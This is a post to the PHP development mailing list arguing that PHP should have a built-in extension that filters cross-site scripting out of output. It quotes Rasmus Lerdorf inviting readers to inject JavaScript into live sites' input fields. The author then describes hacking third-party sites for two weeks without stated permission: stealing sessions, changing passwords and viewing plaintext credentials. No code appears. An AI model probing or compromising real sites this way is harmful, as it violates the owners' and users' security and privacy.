Rasmus Lerdorf <[EMAIL PROTECTED]> wrote... : > this would likely have different security policies, but I do think a > general hook is something that would be useful to all of PHP. > > A huge number of web apps today are extremely vulnerable to > cross-site-scripting attacks. Occasionally developers remember to clean > their data before displaying it, but for the most part they don't. Take > half and hour and find yourself a collection of sites where you can enter > data that is somehow displayed back to you. Shopping carts that ask for > your name and phone number, or half of php.net's own stuff. Stick a bit > of javascript in your phone number and watch.
Just a little note here. The government project I am working on was attacked on New Year's night with XSS. Therefore, after we fixed it we decided to see what else is vulnerable oiut there. During the last two weeks I have played with a variaty of sites/portals/apps trying to hack them to see how far I can go. I ended up stealing the sessions of any **** installations, changing the passwords on **** main website and could see the list of passwords in pain user:pass format assigned as a cookie to anyone who sees my message on ***. Now, every *** was notified by me and, till they all will fix these, I will try not to reveal their names. What I think PHP should have is a function of a whole extension which parses the output in various ways cleaning XSS in it. Also, having such functionality in PHP would help it looking more secure as XSS affects any programming language and not namy have such protections. -- Maxim Maletsky [EMAIL PROTECTED] -- PHP Development Mailing List <http://www.php.net/> To unsubscribe, visit: http://www.php.net/unsub.php
